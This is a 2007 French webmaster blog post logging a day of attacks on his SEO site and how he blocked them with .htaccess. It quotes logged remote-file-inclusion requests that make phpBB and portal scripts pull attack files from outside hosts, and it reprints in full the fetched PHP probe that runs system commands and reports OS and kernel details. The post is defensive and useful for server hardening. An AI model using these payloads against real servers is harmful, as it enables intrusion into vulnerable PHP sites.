Aller au contenu | Aller au menu | Aller à la recherche

Aide au référencement

Aide au référencement

 
 
Les attaques du jour sur mon serveur

Par Bruno, jeudi 20 septembre 2007 à 20:14 | Robots spammeurs | #20 | rss

pirateVoici les attaques HTTP qu'à subit aujourd'hui mon serveur. des attaques contre PhpBB et des tentatives d'injections SQL. Une journée très ordinaire...

Attaque contre phpBB

Ce script malicieux hébergé sur .u-psud.fr effectue des requête destinées à trouver une faille sur mon serveur :

webserver.lps.u-psud.fr - - 19/Sep/2007:07:36:09 +0200 "GET /annuaire//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
webserver.lps.u-psud.fr - - 19/Sep/2007:07:36:10 +0200 "GET /annuaire//includes/functions_num_image.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
webserver.lps.u-psud.fr - - 19/Sep/2007:07:40:38 +0200 "GET /annuaire/kit-graphique-des...quelques-euros-s-369.html//includes/functions_num_image.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.79"
webserver.lps.u-psud.fr - - 19/Sep/2007:07:42:51 +0200 "GET /annuaire//includes/functions_num_image.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
webserver.lps.u-psud.fr - - 19/Sep/2007:07:42:52 +0200 "GET /annuaire/flux-rss-kits-gra...n-logos-web-f-55-369.html//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.t
webserver.lps.u-psud.fr - - 19/Sep/2007:09:03:18 +0200 "GET //admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
webserver.lps.u-psud.fr - - 19/Sep/2007:09:03:18 +0200 "GET /annuaire/flux-rss-kits-gra...n-logos-web-f-55-369.html//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
webserver.lps.u-psud.fr - - 19/Sep/2007:09:03:18 +0200 "GET /annuaire/flux-rss-kits-gra...n-logos-web-f-55-369.html//includes/functions_num_image.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.79"
webserver.lps.u-psud.fr - - 19/Sep/2007:09:03:18 +0200 "GET //includes/functions_num_image.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
webserver.lps.u-psud.fr - - 19/Sep/2007:09:07:46 +0200 "GET /annuaire/kit-graphique-des...quelques-euros-s-369.html//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
webserver.lps.u-psud.fr - - 19/Sep/2007:09:09:59 +0200 "GET /annuaire/flux-rss-kits-gra...n-logos-web-f-55-369.html//includes/functions_num_image.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.79"
webserver.lps.u-psud.fr - - 19/Sep/2007:09:10:00 +0200 "GET /annuaire//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
webserver.lps.u-psud.fr - - 19/Sep/2007:09:10:00 +0200 "GET //admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
webserver.lps.u-psud.fr - - 19/Sep/2007:09:10:00 +0200 "GET //includes/functions_num_image.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
webserver.lps.u-psud.fr - - 19/Sep/2007:09:13:53 +0200 "GET /annuaire/kit-graphique-des...quelques-euros-s-369.html//admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
webserver.lps.u-psud.fr - - 19/Sep/2007:09:13:56 +0200 "GET /annuaire/kit-graphique-des...quelques-euros-s-369.html//includes/functions_num_image.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.79"

Par curiosité, je suis allé voir ce qui se trouvait à l'adresse que l'on trouve dans la requête HTTP (http://usuarios.arnet.com.ar/larry123/safe.txt?). Voici son contenu :

<?
$dir = @getcwd();
$ker = @php_uname();
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir); 
if ($free === FALSE) {$free = 0;} 
if ($free < 0) {$free = 0;} 
echo "Free:".view_size($free)."<br>"; 
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size) 
{ 
if (!is_numeric($size)) {return FALSE;} 
else 
{ 
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
else {$size = $size . " B";} 
return $size; 
}
} 

?>

Le domain u-psud.fr est désormais banni par mon .htaccess

Ce robot a effectué plusieurs certaines de requêtes de ce type :

bd214311.virtua.com.br - - 19/Sep/2007:03:02:56 +0200 "GET / HTTP/1.1" 403 210 "-" "www.epitu.com"

Pas de lecture de robots.txt et User-Agent quelque peu exotique. D'ailleur, l'adresse dans la requête ne donne rien... .virtua.com est depuis un bon moment interdit sur le serveur par mon .htaccess

Encore une attaque de phpBB

c-69-243-223-73.hsd1.va.comcast.net - - 19/Sep/2007:04:04:13 +0200 "GET / HTTP/1.0" 403 198 "http://www.referencement-fr.com/forum/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20050519 Netscape/8.0.1"
@@c-69-243-223-73.hsd1.va.comcast.net - - 19/Sep/2007:04:04:16 +0200 "GET /phpbb/index.php HTTP/1.0" 403 213 "http://www.referencement-fr.com/phpbb/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20050519 Netscape/8.0.1"

Le domaine comcast.net est aussi bloqué sur www.referencement-fr.com

Attaque phpBB

189.1.168.168 - - 19/Sep/2007:07:14:45 +0200 "GET /portail/modules.php?name=http://www.by-kaos.org/r57.txt? HTTP/1.1" 403 229 "-" "Mozilla/3.0 (compatible; Indy Library)"
189.1.168.168 - - 19/Sep/2007:07:14:47 +0200 "GET /portail/modules.php?name=http://www.by-kaos.org/r57.txt? HTTP/1.1" 403 229 "-" "Mozilla/3.0 (compatible; Indy Library)"
189.1.168.168 - - 19/Sep/2007:13:50:12 +0200 "GET /portail/modules.php?name=http://www.by-kaos.org/r57.txt? HTTP/1.1" 403 229 "-" "Mozilla/3.0 (compatible; Indy Library)"
189.1.168.168 - - 19/Sep/2007:13:50:15 +0200 "GET /portail/modules.php?name=http://www.by-kaos.org/r57.txt? HTTP/1.1" 403 229 "-" "Mozilla/3.0 (compatible; Indy Library)"
189.1.168.168 - - 19/Sep/2007:16:01:50 +0200 "GET /portail/modules.php?name=http://www.by-kaos.org/r57.txt? HTTP/1.1" 403 229 "-" "Mozilla/3.0 (compatible; Indy Library)"
189.1.168.168 - - 19/Sep/2007:16:01:54 +0200 "GET /portail/modules.php?name=http://www.by-kaos.org/r57.txt? HTTP/1.1" 403 229 "-" "Mozilla/3.0 (compatible; Indy Library)"
189.1.168.168 - - 19/Sep/2007:16:40:55 +0200 "GET /portail/modules.php?name=http://www.by-kaos.org/r57.txt? HTTP/1.1" 403 229 "-" "Mozilla/3.0 (compatible; Indy Library)"

Avast m'a emêcher de lire l'adresse http://www.by-kaos.org/r57.txt? car il contient un Trojan (code Avast: JS:TrojDnldr-16)

L'User-Agent Indy Library est déjà bloqué sur www.referencement-fr.com

Une requête incorrecte et très étrange :

74.124.192.3 - - 19/Sep/2007:09:16:48 +0200 "GET http://www.referencement-fr.com/ HTTP/1.0" 403 198 "-" "kYurlsbskvtqukbehbgi"

De me demande comment Googolbot a t'il trouvé cette adresse ? (/pnote-13-1)
crawl-66-249-65-113.googlebot.com - - 19/Sep/2007:09:46:17 +0200 "GET /pnote-13-1 HTTP/1.1" 404 216 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
Ceci n'est pas une attaque.

Attaque d'un serveur sous Microsoft

194.250.98.243 - - 19/Sep/2007:11:19:38 +0200 "GET /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0 HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
194.250.98.243 - - 19/Sep/2007:12:46:47 +0200 "GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0 HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"

Ce genre d'attaque est effectué sur tous les serveurs, qu'ils soient sous Apache ou sous Microsoft...

Un script hébergé sur kundenserver.de tente d'utiliser différents formulaires sur www.referencement-fr.com. Ce robot passe tous les jours malgré son interdiction (code 403 retourné).

@infong344.kundenserver.de - - 19/Sep/2007:13:06:16 +0200 "POST /submit.php HTTP/1.0" 403 208 "http://www.referencement-fr.com/" "-"
infong360.kundenserver.de - - 19/Sep/2007:14:04:56 +0200 "POST /partenaires/addlink.php HTTP/1.0" 403 221 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"@@
infong360.kundenserver.de - - 19/Sep/2007:14:21:23 +0200 "POST /partenaires/addlink.php HTTP/1.0" 403 221 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"@@
infong360.kundenserver.de - - 19/Sep/2007:15:17:30 +0200 "GET /partenaires/ HTTP/1.0" 403 210 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"@@
infong360.kundenserver.de - - 19/Sep/2007:15:18:16 +0200 "GET /partenaires/ HTTP/1.0" 403 210 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"@@
infong360.kundenserver.de - - 19/Sep/2007:16:44:40 +0200 "POST /partenaires/addlink.php HTTP/1.0" 403 221 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"@@
infong360.kundenserver.de - - 19/Sep/2007:16:44:40 +0200 "GET /partenaires/ HTTP/1.0" 403 210 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"

kundenserver.de est banni par mon .htaccess

Requête incorrecte par un robot nommé larbin_2.6.3. Celui-ci demande un mauvais robots.txt qi n'existe forcément pas, et tente de crawler quand même le site.

81.223.153.134 - - 19/Sep/2007:14:10:33 +0200 "GET /xxx_robots.txt HTTP/1.0" 403 212 "-" "larbin_2.6.3 (larbin2.6.3@unspecified.mail)"
81.223.153.134 - - 19/Sep/2007:14:10:38 +0200 "GET / HTTP/1.0" 403 198 "-" "larbin_2.6.3 larbin2.6.3@unspecified.mail"

@unspecified.mail est interdit dans l'User-Agent par mon .htaccess sur www.referencement-fr.com

Un robot qui donne n'importe quoi comme identification :

s010600179ac2b777.wp.shawcable.net - - 19/Sep/2007:22:25:05 +0200 "GET /robots.txt HTTP/1.0" 403 208 "-" "u_forgot_to_click_PayPal_biatch (root@localhost)"
s010600179ac2b777.wp.shawcable.net - - 20/Sep/2007:00:08:32 +0200 "GET /robots.txt HTTP/1.0" 403 208 "-" "u_forgot_to_click_PayPal_biatch (root@localhost)"

Encore une attaque de phpBB

84.19.188.158 - - 19/Sep/2007:22:52:21 +0200 "GET /forum/index.php HTTP/1.0" 404 209 "http://www.referencement-fr.com/forum/index.php" "Opera/8.00 (Windows NT 5.1; U; en)"
84.19.188.158 - - 19/Sep/2007:22:52:36 +0200 "GET /forum/phpbb/index.php HTTP/1.0" 404 215 "http://www.referencement-fr.com/phpbb/index.php" "Opera/8.00 (Windows NT 5.1; U; en)"
84.19.188.158 - - 19/Sep/2007:22:52:56 +0200 "GET /forum/phpbb2/index.php HTTP/1.0" 404 216 "http://www.referencement-fr.com/phpbb2/index.php" "Opera/8.00 (Windows NT 5.1; U; en)"
84.19.188.158 - - 19/Sep/2007:22:53:11 +0200 "GET /phpbb2/forums/index.php HTTP/1.0" 404 217 "http://www.referencement-fr.com/forums/index.php" "Opera/8.00 (Windows NT 5.1; U; en)"
@@84.19.188.158 - - 19/Sep/2007:22:53:31 +0200 "GET /phpbb2/board/index.php HTTP/1.0" 404 216 "http://www.referencement-fr.com/board/index.php" "Opera/8.00 (Windows NT 5.1; U; en)"

On trouve des informations sur cette adresse (84.19.188.158) avec Google. L'IP sera donc bloqué prochainement.

Des requêtes nombreuses, incorrectes et complètement inutile de ce type :

74.124.192.3 - - 20/Sep/2007:04:20:32 +0200 "GET http://www.referencement-fr.com/ HTTP/1.0" 403 198 "-" "kYurlsbskvtqukbehbgi"

Voilà donc les attaques qu'a subit (sans dommage) aujourd'hui mon serveur. Ces requêtes prennent évidement de la ressource à votre serveur si vos n'avez pas bloqué certaines adresses ou User-Agent. Une page 403 (Accès interdit) est très légère. Si vous connaissez une IP idélicate, il veut mieux lui retourner un 403 qu'un 404 (page introuvable) ou 200 (correcte).

 
‹ retour à l'accueil
Commentaires
1.   Admin  â€º  mercredi 17 octobre 2007 à 11:24

Bonjour,

Concernant les attaques provenant des sites academiques francais vous pouvez envoyer vos plaintes a l'adresse abuse-at-renater.fr et certsvp-at-renater.fr

Pour info la machine webserver.lps.u-psud.fr a elle meme ete attaque et utilise par un intrus pour lancer un scanner de vulnerabilité rfi (remote file include), pour compromettre d'autres serveurs webs. Ce genre de probleme est symptomatique des nombreuses failles dans les applications PHP/ASP.

Cdlt, CERT-Renater

 
2.   Igor  â€º  dimanche 21 octobre 2007 à 09:29

Merci beaucoup, toutes ces informations m'ont été très utiles, ayant subit la même attaque. J'ai bloqué l'user agent ibwww-perl/5.79 dans mon .htaccess.

Bonne continuation

 
3.   Ben  â€º  dimanche 21 octobre 2007 à 18:16

Concernant l'abération des requêtes de certains robots c'est flagrant .. j'ai eu larbin qui m'a généré la première erreur 404 depuis 1 semaine .. weird

Pour les risques de vulnérabilité, personne ne possède de bonnes règles d'exclusion qui font pas trop ramer un apache sur 1and1 ?

 
‹ retour à l'accueil
Trackbacks

Aucun trackback.

Pour faire un trackback sur ce billet : http://www.referencement-fr.com/blog/tb.php?id=20

 
Ajouter un commentaire

Ce blog permet une syntaxe wiki simplifiée dans les commentaires. Si votre navigateur est compatible, vous pouvez vous aider de la barre d´outils, les adresses internet seront converties automatiquement. Le code HTML sera affiché comme du texte.